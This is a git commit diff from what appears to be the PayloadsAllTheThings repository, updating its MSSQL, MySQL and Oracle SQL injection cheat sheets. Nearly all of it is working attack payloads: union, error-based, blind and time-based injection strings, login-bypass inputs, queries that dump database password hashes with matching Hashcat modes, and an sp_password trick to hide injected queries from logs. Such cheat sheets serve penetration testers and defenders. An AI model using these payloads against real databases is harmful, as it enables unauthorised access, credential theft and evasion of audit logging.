1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-03-29 07:10:16 +01:00

MySQL MSSQL Oracle SQL Update

This commit is contained in:
Swissky 2023-04-14 17:45:45 +02:00
parent 25d2be529f
commit 6861c46fcd
4 changed files with 188 additions and 51 deletions

View File

@ -2,15 +2,16 @@
## Summary
* [MSSQL Default Databases](#mssql-default-databases)
* [MSSQL Comments](#mssql-comments)
* [MSSQL User](#mssql-user)
* [MSSQL Version](#mssql-version)
* [MSSQL Hostname](#mssql-hostname)
* [MSSQL Database name](#mssql-database-name)
* [MSSQL Database Name](#mssql-database-name)
* [MSSQL Database Credentials](#mssql-database-credentials)
* [MSSQL List databases](#mssql-list-databases)
* [MSSQL List columns](#mssql-list-columns)
* [MSSQL List tables](#mssql-list-tables)
* [MSSQL Extract user/password](#mssql-extract-userpassword)
* [MSSQL Union Based](#mssql-union-based)
* [MSSQL Error Based](#mssql-error-based)
* [MSSQL Blind Based](#mssql-blind-based)
@ -25,12 +26,27 @@
* [MSSQL Trusted Links](#mssql-trusted-links)
* [MSSQL List permissions](#mssql-list-permissions)
## MSSQL Default Databases
| Name | Description |
|-----------------------|---------------------------------------|
| pubs | Not available on MSSQL 2005 |
| model | Available in all versions |
| msdb | Available in all versions |
| tempdb | Available in all versions |
| northwind | Available in all versions |
| information_schema | Availalble from MSSQL 2000 and higher |
## MSSQL Comments
```sql
-- comment goes here
/* comment goes here */
```
| Type | Description |
|----------------------------|-----------------------------------|
| `/* MSSQL Comment */` | C-style comment |
| `-- -` | SQL comment |
| `;%00` | Null byte |
## MSSQL User
@ -41,7 +57,7 @@ SELECT system_user;
SELECT user;
```
## MSSQL version
## MSSQL Version
```sql
SELECT @@version
@ -51,7 +67,11 @@ SELECT @@version
```sql
SELECT HOST_NAME()
SELECT @@hostname;
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');
```
## MSSQL Database name
@ -60,6 +80,22 @@ SELECT @@hostname;
SELECT DB_NAME()
```
## MSSQL Database Credentials
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
```sql
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
```
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
```sql
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL List databases
```sql
@ -88,17 +124,6 @@ SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
```
## MSSQL Extract user/password
```sql
MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL Union Based
@ -141,6 +166,7 @@ AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
@ -159,7 +185,8 @@ ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
```
## MSSQL Stacked Query
@ -325,6 +352,15 @@ Check if current user is a member of the specified server role.
SELECT is_srvrolemember('sysadmin');
```
## MSSQL OPSEC
Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
```sql
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
```
## References
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)

View File

@ -2,7 +2,8 @@
## Summary
* [MYSQL Comment](#mysql-comment)
* [MYSQL Default Databases](#mysql-default-databases)
* [MYSQL Comments](#mysql-comments)
* [MYSQL Union Based](#mysql-union-based)
* [Detect columns number](#detect-columns-number)
* [Extract database with information_schema](#extract-database-with-information_schema)
@ -35,15 +36,61 @@
* [References](#references)
## MYSQL comment
## MYSQL Default Databases
```sql
# MYSQL Comment
-- comment [Note the space after the double dash]
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MYSQL version 3.23.02
```
| Name | Description |
|--------------------|--------------------------|
| mysql | Requires root privileges |
| information_schema | Availalble from version 5 and higher |
## MYSQL comments
| Type | Description |
|----------------------------|-----------------------------------|
| `#` | Hash comment |
| `/* MYSQL Comment */` | C-style comment |
| `/*! MYSQL Special SQL */` | Special SQL |
| `/*!32302 10*/` | Comment for MYSQL version 3.23.02 |
| `-- -` | SQL comment |
| `;%00` | Nullbyte |
| \` | Backtick |
## MYSQL Testing Injection
* **Strings**: Query like `SELECT * FROM Table WHERE id = 'FUZZ';`
```
' False
'' True
" False
"" True
\ False
\\ True
```
* **Numeric**: Query like `SELECT * FROM Table WHERE id = FUZZ;`
```ps1
AND 1 True
AND 0 False
AND true True
AND false False
1-false Returns 1 if vulnerable
1-true Returns 0 if vulnerable
1*56 Returns 56 if vulnerable
1*56 Returns 1 if not vulnerable
```
* **Login**: Query like `SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';`
```ps1
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+
```
## MYSQL Union Based
@ -177,9 +224,6 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
```
## MYSQL Error Based
### MYSQL Error Based - Basic
@ -191,6 +235,7 @@ Works with `MySQL >= 4.1`
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
```
### MYSQL Error Based - UpdateXML function
```sql
@ -208,6 +253,7 @@ Shorter to read:
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```
### MYSQL Error Based - Extractvalue function
Works with `MySQL >= 5.1`
@ -220,6 +266,7 @@ Works with `MySQL >= 5.1`
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```
### MYSQL Error Based - NAME_CONST function (only for constants)
Works with `MySQL >= 5.0`
@ -230,6 +277,7 @@ Works with `MySQL >= 5.0`
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
```
## MYSQL Blind
### MYSQL Blind with substring equivalent
@ -306,13 +354,17 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
The following SQL codes will delay the output from MySQL.
```sql
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
```
* MySQL 4/5 : `BENCHMARK()`
```sql
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
```
* MySQL 5: `SLEEP()`
```sql
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
```
### Using SLEEP in a subselect
@ -342,6 +394,7 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
```
## MYSQL DIOS - Dump in One Shot
```sql

View File

@ -2,8 +2,12 @@
## Summary
* [Oracle SQL version](#oracle-sql-version)
* [Oracle SQL database name](#oracle-sql-database-name)
* [Oracle SQL Default Databases](#oracle-sql-default-databases)
* [Oracle SQL Comments](#oracle-sql-comments)
* [Oracle SQL Version](#oracle-sql-version)
* [Oracle SQL Hostname](#oracle-sql-hostname)
* [Oracle SQL Database Name](#oracle-sql-database-name)
* [Oracle SQL Database Credentials](#oracle-sql-database-credentials)
* [Oracle SQL List databases](#oracle-sql-list-databases)
* [Oracle SQL List columns](#oracle-sql-list-columns)
* [Oracle SQL List tables](#oracle-sql-list-tables)
@ -13,13 +17,42 @@
* [Oracle SQL Command execution](#oracle-sql-command-execution)
* [References](#references)
## Oracle SQL version
## Oracle SQL Default Databases
| Name | Description |
|--------------------|---------------------------|
| SYSTEM | Available in all versions |
| SYSAUX | Available in all versions |
## Oracle SQL Comments
| Type | Description |
|----------------------------|-----------------------------------|
| `-- -` | SQL comment |
## Oracle SQL Version
```sql
SELECT user FROM dual UNION SELECT * FROM v$version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
```
## Oracle SQL database name
## Oracle SQL Hostname
```sql
SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
```
## Oracle SQL Database Name
```sql
SELECT global_name FROM global_name;
@ -28,6 +61,15 @@ SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
```
## Oracle SQL Database Credentials
| Query | Description |
|-----------------------------------------|---------------------------|
| `SELECT username FROM all_users;` | Available on all versions |
| `SELECT name, password from sys.user$;` | Privileged, <= 10g |
| `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g |
## Oracle SQL List Databases
```sql
@ -71,12 +113,14 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
| Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
| First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
## Oracle SQL Time based
```sql
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
```
## Oracle SQL Command Execution
* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
@ -140,4 +184,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
* [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)

View File

@ -10,12 +10,15 @@ Attempting to manipulate SQL queries may have goals including:
## Summary
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [CheatSheets](#cheatsheets)
* [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
* [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
* [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
* [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
* [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
* [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)